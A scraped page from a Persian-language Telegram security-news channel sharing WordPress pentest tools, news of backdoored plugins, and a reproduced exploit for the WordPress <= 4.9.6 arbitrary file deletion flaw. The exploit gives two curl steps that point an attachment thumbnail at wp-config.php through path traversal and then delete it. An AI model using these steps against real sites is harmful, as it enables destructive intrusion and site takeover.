امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
کشف باگ در افزونه های وردپرس با WPSploit

https://github.com/m4ll0k/WPSploit

#wordpress
#web
#pentest

@sec_nerd
5500 وبسایت وردپرسی حاوی اسکریپتی هستند که ورودهای کاربران را ضبط میکند!
https://bit.ly/2joah9Q

#wordpress
#web

@sec_nerd
سه پلاگین دیگر وردپرس حاوی بکدور هستند.

https://bit.ly/2Ce20jt

#wordpress
#backdoor

@sec_nerd
اکسپلویت کردن وبسایتهای وردپرسی با استفاده از burpsuite

#wordpress
#web
#Pentest

@sec_nerd
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!

# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :

Step 1:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'


Step 2:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'



#wordpress
#wp
#exploit
#web
#pentest

@sec_nerd
ابزار شناسایی و اسکن بیش از 80 سیستم مدیریت محتوا

https://github.com/Tuhinshubhra/CMSeeK

#web
#pentest
#tools
#wordpress
#joomla


@sec_nerd